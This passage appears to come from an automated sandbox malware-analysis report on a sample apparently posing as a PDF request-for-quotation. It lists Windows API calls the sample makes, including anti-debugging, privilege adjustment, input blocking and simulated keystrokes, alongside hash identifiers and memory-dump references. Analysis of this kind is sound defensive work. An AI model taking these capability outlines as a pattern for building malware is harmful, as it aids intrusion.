                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorEventFileInternetLastRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 234945975-0
                                                                                                                • Opcode ID: a2b745910e2f88fe5ab5526db894d7dbc4608d6a4368c2c05c947b7bbac3e316
                                                                                                                • Instruction ID: b11735057fafa97f850f363ac7001320c0389ff51cc61140b76706a6589f78e9
                                                                                                                • Opcode Fuzzy Hash: a2b745910e2f88fe5ab5526db894d7dbc4608d6a4368c2c05c947b7bbac3e316
                                                                                                                • Instruction Fuzzy Hash: B3219DB1600306EBDB20DFA5C948FA7B7FCEB40364F10445EE54692152E770EE05CBA0
                                                                                                                APIs
                                                                                                                • lstrlenW.KERNEL32(?,00A85222), ref: 00AADBCE
                                                                                                                • GetFileAttributesW.KERNEL32(?), ref: 00AADBDD
                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 00AADBEE
                                                                                                                • FindClose.KERNEL32(00000000), ref: 00AADBFA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 2695905019-0
                                                                                                                • Opcode ID: 576516418daab862f46a989e78c0ec6524eafe1c87704ec12e8e88491b8c1b29
                                                                                                                • Instruction ID: 198d959d0516656b55a96f6d9137e7870a152574a940da8c0a4509c9c11e088f
                                                                                                                • Opcode Fuzzy Hash: 576516418daab862f46a989e78c0ec6524eafe1c87704ec12e8e88491b8c1b29
                                                                                                                • Instruction Fuzzy Hash: 46F0A03081192167C220AFB8AC0D8AA377C9E02334B904713F8B7C24E0EBB45D56C695
                                                                                                                APIs
                                                                                                                • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00AA82AA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: lstrlen
                                                                                                                • String ID: ($|
                                                                                                                • API String ID: 1659193697-1631851259
                                                                                                                • Opcode ID: 7b74adc89cfc38ccf8cef03a48e9c005e415e492ec9e8de045d170b4d8e9f33f
                                                                                                                • Instruction ID: f8d8379291e46561bd7173b3df1a428e64049c95f270fcf98b3d4566223df676
                                                                                                                • Opcode Fuzzy Hash: 7b74adc89cfc38ccf8cef03a48e9c005e415e492ec9e8de045d170b4d8e9f33f
                                                                                                                • Instruction Fuzzy Hash: D5322575A007059FCB28CF59C481A6AB7F0FF48710B15C56EE89ADB3A1EB74E981CB50
                                                                                                                APIs
                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 00AB5CC1
                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00AB5D17
                                                                                                                • FindClose.KERNEL32(?), ref: 00AB5D5F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Find$File$CloseFirstNext
                                                                                                                • String ID:
                                                                                                                • API String ID: 3541575487-0
                                                                                                                • Opcode ID: 383d315ece3c8e907dda39be301c18574c7778da158fd1728758e6f2d046bf21
                                                                                                                • Instruction ID: 76ed7725011377b76d4d916b271f3216734f5f0ce49e4110f1b30bbc082c8d5c
                                                                                                                • Opcode Fuzzy Hash: 383d315ece3c8e907dda39be301c18574c7778da158fd1728758e6f2d046bf21
                                                                                                                • Instruction Fuzzy Hash: D1518A75A04A019FC714DF28C494A9AB7E8FF49324F14865EE95A8B3A2DB30FD05CF91
                                                                                                                APIs
                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 00A7271A
                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00A72724
                                                                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 00A72731
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                • String ID:
                                                                                                                • API String ID: 3906539128-0
                                                                                                                • Opcode ID: 6916c542ec8d6d3d9124ea9b9dda3a325d2b2a1e49e65027034c5c4a020bf991
                                                                                                                • Instruction ID: d2844f649c738fe4bcde64fc717544e639b2ddbb54c75196c834a37e4d5af908
                                                                                                                • Opcode Fuzzy Hash: 6916c542ec8d6d3d9124ea9b9dda3a325d2b2a1e49e65027034c5c4a020bf991
                                                                                                                • Instruction Fuzzy Hash: 5831C87491121C9BCB21DF64DD897DDB7B8AF18350F5082DAE41CA7261E7309F818F45
                                                                                                                APIs
                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 00AB51DA
                                                                                                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00AB5238
                                                                                                                • SetErrorMode.KERNEL32(00000000), ref: 00AB52A1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorMode$DiskFreeSpace
                                                                                                                • String ID:
                                                                                                                • API String ID: 1682464887-0
                                                                                                                • Opcode ID: 9cf7aa2e0011a982595bbe8ecefebecc7e81d4317b4905239183b55b0466b98c
                                                                                                                • Instruction ID: 538ec7a0db405eba390b59e78b28182d0ae4d3aa4a8ab31b0be458539247a211
                                                                                                                • Opcode Fuzzy Hash: 9cf7aa2e0011a982595bbe8ecefebecc7e81d4317b4905239183b55b0466b98c
                                                                                                                • Instruction Fuzzy Hash: 4B314D75A005189FDB00DF94D884FEDBBB4FF49314F048099E845AB352DB31E956CB91
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A5FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00A60668
                                                                                                                  • Part of subcall function 00A5FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00A60685
                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00AA170D
                                                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00AA173A
                                                                                                                • GetLastError.KERNEL32 ref: 00AA174A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 577356006-0
                                                                                                                • Opcode ID: f8aa63b29026fa85a20e70e7f04480642231610ca3279c0d8c6952f0a934393c
                                                                                                                • Instruction ID: ebf1a233343bd0a2ffce6cb14052088e466abb9e82580d725a296bb4caf153cb
                                                                                                                • Opcode Fuzzy Hash: f8aa63b29026fa85a20e70e7f04480642231610ca3279c0d8c6952f0a934393c
                                                                                                                • Instruction Fuzzy Hash: C211CEB2400305BFD718EF54DC86D6AB7B9FB04724B20852EE45697281EB70BC42CA20
                                                                                                                APIs
                                                                                                                • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00AAD608
                                                                                                                • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00AAD645
                                                                                                                • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00AAD650
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 33631002-0
                                                                                                                • Opcode ID: 0c57751b090b959845e383d5243c341951a1a38c013866192d6da585ff279f2c
                                                                                                                • Instruction ID: 55916ba06faeaac0306634a3a6942cc84cf7f9ace51d80c2f702da7e7a5b5a1e
                                                                                                                • Opcode Fuzzy Hash: 0c57751b090b959845e383d5243c341951a1a38c013866192d6da585ff279f2c
                                                                                                                • Instruction Fuzzy Hash: 85118E71E05228BFDB10CF94DC44FAFBBBCEB45B60F108112F905E7290C2704A018BA1
                                                                                                                APIs
                                                                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00AA168C
                                                                                                                • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00AA16A1
                                                                                                                • FreeSid.ADVAPI32(?), ref: 00AA16B1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                • String ID:
                                                                                                                • API String ID: 3429775523-0
                                                                                                                • Opcode ID: 7bd4149bb5b21a3717829b116bfd361c9a834d4b4d39e9b129fa8c6bfab22cdf
                                                                                                                • Instruction ID: c76af76a21b0fd35cef95bfc52e278bb617d775da8bf3edfbb639b0f76718635
                                                                                                                • Opcode Fuzzy Hash: 7bd4149bb5b21a3717829b116bfd361c9a834d4b4d39e9b129fa8c6bfab22cdf
                                                                                                                • Instruction Fuzzy Hash: A9F0F471951309FBDF00DFE49C89AAEBBBCEB08614F904565E501E2181E774AA448A50
                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32(00A728E9,?,00A64CBE,00A728E9,00B088B8,0000000C,00A64E15,00A728E9,00000002,00000000,?,00A728E9), ref: 00A64D09
                                                                                                                • TerminateProcess.KERNEL32(00000000,?,00A64CBE,00A728E9,00B088B8,0000000C,00A64E15,00A728E9,00000002,00000000,?,00A728E9), ref: 00A64D10
                                                                                                                • ExitProcess.KERNEL32 ref: 00A64D22
                                                                                                                Similarity
                                                                                                                • API ID: Process$CurrentExitTerminate
                                                                                                                • String ID:
                                                                                                                • API String ID: 1703294689-0
                                                                                                                • Opcode ID: 4f9260e838afb943477b0a24657eab5d31f911beebcf78468f7b17b6a3eae550
                                                                                                                • Instruction ID: 1410faa33a547472d0a6bd53d8470f1b92a9d412ef4adc01e860ee1fac221f9d
                                                                                                                • Opcode Fuzzy Hash: 4f9260e838afb943477b0a24657eab5d31f911beebcf78468f7b17b6a3eae550
                                                                                                                • Instruction Fuzzy Hash: 82E0B631401149EFCF11AF94DE09A597B79EB45791F508015FC1A8B122CB35DD42DA80
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: /
                                                                                                                • API String ID: 0-2043925204
                                                                                                                • Opcode ID: e762b2dea092c8c63ef5d925f2b83147829d4e2af186a8ea93f0ddc4c98a6522
                                                                                                                • Instruction ID: 96ed9000defc74a16df7dcf81cee9b45912ff3885503087edab824b631cabfa4
                                                                                                                • Opcode Fuzzy Hash: e762b2dea092c8c63ef5d925f2b83147829d4e2af186a8ea93f0ddc4c98a6522
                                                                                                                • Instruction Fuzzy Hash: FA414972500219AFCB20AFB9CC48EBBB7B8EB84324F10C26DF909DB181E6309D41CB50
                                                                                                                APIs
                                                                                                                • GetUserNameW.ADVAPI32(?,?), ref: 00A9D28C
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: NameUser
                                                                                                                • String ID: X64
                                                                                                                • API String ID: 2645101109-893830106
                                                                                                                • Opcode ID: 1abadf75d89217a58ed980144c753b80a0160946f342c66b65c278b8165b57af
                                                                                                                • Instruction ID: 4ccb37406d5ea6e26e86a86dcd8d83f6c48e1cc4f7037b966094eafac1d17a7a
                                                                                                                • Opcode Fuzzy Hash: 1abadf75d89217a58ed980144c753b80a0160946f342c66b65c278b8165b57af
                                                                                                                • Instruction Fuzzy Hash: 7CD0C9B480112DEACF90CB90EC88DD9B3BCBB04306F500152F506A2080D73096498F10
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                                                                • Instruction ID: 22e52ec1207b46d939c60380833cd67fc89c4c56c97ff498a69e8983582815ee
                                                                                                                • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                                                                • Instruction Fuzzy Hash: 5C021C71E002199FDF14CFA9C9806ADFBF5FF88324F25816AD959E7380D731AA418B94
                                                                                                                APIs
                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 00AB6918
                                                                                                                • FindClose.KERNEL32(00000000), ref: 00AB6961
                                                                                                                Similarity
                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                • String ID:
                                                                                                                • API String ID: 2295610775-0
                                                                                                                • Opcode ID: fffdaccc1464b1f7840d4e3acdfa15536057a4e89476906598c31ca9c58a5b98
                                                                                                                • Instruction ID: ab9aecf25f6a73614732abc7bda2fd25d2982f5223fe19979fba7675572a1c1b
                                                                                                                • Opcode Fuzzy Hash: fffdaccc1464b1f7840d4e3acdfa15536057a4e89476906598c31ca9c58a5b98
                                                                                                                • Instruction Fuzzy Hash: 4D11B2356042119FD710DF69D484A56BBE5FF85328F14C699F8698F3A2C734EC05CB91
                                                                                                                APIs
                                                                                                                • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00AC4891,?,?,00000035,?), ref: 00AB37E4
                                                                                                                • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00AC4891,?,?,00000035,?), ref: 00AB37F4
                                                                                                                Similarity
                                                                                                                • API ID: ErrorFormatLastMessage
                                                                                                                • String ID:
                                                                                                                • API String ID: 3479602957-0
                                                                                                                • Opcode ID: 59d430ae89ae04b809528b75633fc23d76acee02881dcae5ad30cd42585379fa
                                                                                                                • Instruction ID: db1346b45fe05a382eb7850515e50c7c2674584a68735901dd14c9d5376820cc
                                                                                                                • Opcode Fuzzy Hash: 59d430ae89ae04b809528b75633fc23d76acee02881dcae5ad30cd42585379fa
                                                                                                                • Instruction Fuzzy Hash: 14F055B16012292AEB20A3A68C4CFEB3BAEEFC4771F000222F109D2281C9608D44C7B0
                                                                                                                APIs
                                                                                                                • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00AAB25D
                                                                                                                • keybd_event.USER32(?,7694C0D0,?,00000000), ref: 00AAB270
                                                                                                                Similarity
                                                                                                                • API ID: InputSendkeybd_event
                                                                                                                • String ID:
                                                                                                                • API String ID: 3536248340-0
                                                                                                                • Opcode ID: a5885705eb844f2d1ed8e41092508a8557a395bc3036f1e19d7d867411324c1c
                                                                                                                • Instruction ID: 9a9c2266ba49e696966c281e4ab0320e8ae57ebc7508069a1664bffae087d461
                                                                                                                • Opcode Fuzzy Hash: a5885705eb844f2d1ed8e41092508a8557a395bc3036f1e19d7d867411324c1c
                                                                                                                • Instruction Fuzzy Hash: A1F01D7185424EABDB05DFA0C805BEE7BB4FF05315F00804AF955A6192C3798615DFA4
                                                                                                                APIs
                                                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00AA11FC), ref: 00AA10D4
                                                                                                                • CloseHandle.KERNEL32(?,?,00AA11FC), ref: 00AA10E9
                                                                                                                Similarity
                                                                                                                • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                • String ID:
                                                                                                                • API String ID: 81990902-0
                                                                                                                Strings
                                                                                                                • Variable is not of type 'Object'., xrefs: 00A90C40
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Variable is not of type 'Object'.
                                                                                                                • API String ID: 0-1840281001
                                                                                                                APIs
                                                                                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00A76766,?,?,00000008,?,?,00A7FEFE,00000000), ref: 00A76998
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionRaise
                                                                                                                • String ID:
                                                                                                                • API String ID: 3997070919-0
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID: 0-3916222277
                                                                                                                APIs
                                                                                                                • BlockInput.USER32(00000001), ref: 00ABEABD
                                                                                                                Similarity
                                                                                                                • API ID: BlockInput
                                                                                                                • String ID:
                                                                                                                • API String ID: 3456056419-0
                                                                                                                APIs
                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,00A603EE), ref: 00A609DA
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                • String ID:
                                                                                                                • API String ID: 3192549508-0
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 0-4108050209
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a2d3a53b65b044e98d86a25e723cc78e9e96c53accf070da63c04c0a24082d02
                                                                                                                • Instruction ID: a685bb4729f76a9a11264048d1ddabfeace087e623632440b53d92c3c03c065f
                                                                                                                • Opcode Fuzzy Hash: a2d3a53b65b044e98d86a25e723cc78e9e96c53accf070da63c04c0a24082d02
                                                                                                                • Instruction Fuzzy Hash: E002B4B1E00209EFDF04EF54D981AAEB7B5FF54340F108169E816DB291EB31AE64CB95
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 467794e4bb3230abd496898668ee13c4cc9fa6c0304f5c2815d475639d656b58
                                                                                                                • Instruction ID: 4c80921858a752a54d8cd9789480215b930195091b15a3ef0004b4d85f905d52
                                                                                                                • Opcode Fuzzy Hash: 467794e4bb3230abd496898668ee13c4cc9fa6c0304f5c2815d475639d656b58
                                                                                                                • Instruction Fuzzy Hash: 84B12621D2AF814DC72396398875336B65C6FBB6D5F91D31BFC2779D22EB2185834240
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 4ba5856516aa960e2f9b09371950c982edef84ab8555dd9b3161f9568bc1ab77
                                                                                                                • Instruction ID: 4282948d7e70563a0cb410606892ea2313c5deb4178577a8287d47d942065f1c
                                                                                                                • Opcode Fuzzy Hash: 4ba5856516aa960e2f9b09371950c982edef84ab8555dd9b3161f9568bc1ab77
                                                                                                                • Instruction Fuzzy Hash: B2618A7123870956DF349BB88DA5BBF63B8DF5178CF240A1AE843DB281DA15DE82C315
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
